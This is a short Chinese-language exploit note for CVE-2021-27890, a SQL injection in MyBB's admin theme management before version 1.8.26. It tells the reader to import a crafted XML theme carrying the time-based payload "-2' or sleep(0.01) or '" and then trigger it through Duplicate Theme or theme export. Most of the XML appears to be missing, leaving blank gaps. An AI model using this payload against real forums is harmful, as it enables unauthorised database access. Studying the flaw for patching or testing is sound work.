CVE-2021-27890_MyBB後台論壇主題管理SQL注入漏洞_zh-tw

# CVE-2021-27890 MyBB後台論壇主題管理SQL注入漏洞/zh-tw

==影響版本==

< 1.8.26

==漏洞利用==

在後台主題管理處導入構造的惡意xml




-2' or sleep(0.01) or '













點擊Duplicate Theme,抓包,成功延时注入(導出主題也會存在該注入)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容